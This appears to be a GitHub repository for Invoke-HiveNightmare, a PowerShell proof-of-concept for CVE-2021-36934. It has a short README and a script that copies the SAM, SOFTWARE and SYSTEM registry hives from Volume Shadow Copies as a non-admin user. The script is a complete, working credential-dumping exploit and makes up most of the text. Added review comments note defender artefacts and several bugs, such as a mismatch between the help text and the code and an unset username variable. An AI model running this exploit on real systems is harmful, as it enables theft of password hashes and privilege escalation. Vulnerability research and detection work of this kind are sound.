├── PoC.gif
├── README.md
└── Invoke-HiveNightmare.ps1

/PoC.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiredPulse/Invoke-HiveNightmare/HEAD/PoC.gif
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Invoke-HiveNightmare
PowerShell-based PoC for CVE-2021-36934, which enables a standard user to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer.

# Situation
In specific versions of Windows 10, standard users have read/execute rights to the files in the [SYSTEMROOT]\System32\Config directory, which is where the Registry hives reside on disk. One cannot, however, simply navigate to the directory and copy/paste them, because the hives are loaded into memory at system boot and are locked. A standard user can retrieve the hives from Volume Shadow Copies if they exist.

# Demo
![Alt text](https://github.com/WiredPulse/Invoke-HiveNightmare/blob/main/PoC.gif)

# Disclaimer
The success of this exploit depends on Volume Shadow Copies existing... without them the code isn't useful.

# Credits
The vulnerability was discovered by @jonasLyk.

--------------------------------------------------------------------------------
/Invoke-HiveNightmare.ps1:
--------------------------------------------------------------------------------
<#
.SYNOPSIS
PoC for CVE-2021-36934, which enables a standard user to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer.

The vulnerability was discovered by @jonasLyk.

.PARAMETER path
Used to supply the path to dump the Registry hives. If the parameter isn't used, the path will default to the user's desktop.

.EXAMPLE
PS C:\> .\Invoke-HiveNightmare.ps1 -path "c:\"

Dumps the hives from the system's Volume Shadow Copies to C:\.

.EXAMPLE
PS C:\> .\Invoke-HiveNightmare.ps1

Dumps the hives from the system's Volume Shadow Copies to C:\users\[USERNAME]\desktop.

.NOTES
File Name : Invoke-HiveNightmare.ps1
Version : v.0.2
Author : @WiredPulse
Created : 21 Jul 21
#>

# Review notes (defensive context):
# - The SYNOPSIS lists the Security hive, but the copy loop below reads only the sam,
#   software and system hives; the help text and the code disagree.
# - Everything below is ordinary file I/O against the
#   \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN device path. Reads of
#   \Windows\System32\config\* through a shadow-copy device path by a non-elevated
#   process, and *.hive files appearing under a user profile, are the observable
#   artefacts a defender can look for.
# - The mitigation is the one the README implies: with no Volume Shadow Copies present
#   the script has nothing to read, and the root cause is the permissive ACL on the
#   hive files in System32\config.

[CmdletBinding()]
param(
    # Output directory for the copied hives.
    # NOTE(review): $username is never assigned in this script and is not one of
    # PowerShell's automatic variables, so it expands to an empty string and the
    # default becomes "C:\Users\\Desktop", not the current user's desktop that the
    # help text and the second .EXAMPLE describe.
    $path = "C:\Users\$username\Desktop"
)

# Destination file names; the shadow-copy index is appended to each in the loop
# below (e.g. Sam.hive1, Soft.hive1, Sys.hive1).
$outSam = "$path\Sam.hive"
$outSoft = "$path\Soft.hive"
$outSys = "$path\Sys.hive"

# Create the output directory if it does not already exist.
if(-not(test-path $path)){
    new-item $path -ItemType Directory | out-null
}

# Build 17763 is Windows 10 1809, the first build the help text names as affected.
# This is a version check only: it does not inspect the hive file ACLs that
# CVE-2021-36934 is actually about, so a system at this build or later may be
# reported as vulnerable even if the ACLs have since been corrected.
# 'pause' waits for Enter; 'break' outside a loop is presumably meant to end the
# script here, but it also propagates to any calling script - confirm if wrapped.
if(([environment]::OSVersion.Version).build -lt 17763){
    Write-Host -ForegroundColor red "[-] System not susceptible to CVE-2021-36934"
    pause
    break
}
else{
    Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "System is a vulnerable version of Windows"
}

# Shadow copies are addressed by device index; indexes 1..9 are tried blindly rather
# than enumerated. Every copy attempt is wrapped in an empty catch{}, which silences
# all failures alike (no such shadow copy, access denied, destination already present -
# the two-argument File.Copy does not overwrite). The "Dumping ..." line is the only
# success indicator, and it is printed only after File.Copy returns without throwing.
for($i = 1; $i -le 9; $i++){
    try{
        [System.IO.File]::Copy(("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $i + "\Windows\System32\config\sam"), ($outSam + $i))
        Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Dumping SAM$i hive..."
    } catch{}
    try{
        [System.IO.File]::Copy(("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $i + "\Windows\System32\config\software"), ($outSoft + $i))
        Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Dumping SOFTWARE$i hive..."
    }
    catch{}
    try{
        [System.IO.File]::Copy(("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $i + "\Windows\System32\config\system"), ($outSys + $i))
        Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Dumping SYSTEM$i hive..."
    }
    catch{}
}

# Final check: the wildcard s*.hive* matches Sam.hive*, Soft.hive* and Sys.hive* (all
# three names start with "s"); the unquoted argument still expands $path. Because the
# catch blocks above discard the real error, the "no Volume Shadow Copies" message is
# also what is shown when copies exist but every read failed for another reason.
if(test-path $path\s*.hive*){
    Write-Host -ForegroundColor yellow "[+] " -NoNewline; Write-Host -ForegroundColor green "Hives are dumped to $path"
}
else{
    Write-Host -ForegroundColor red "[-] There are no Volume Shadow Copies on this system"
}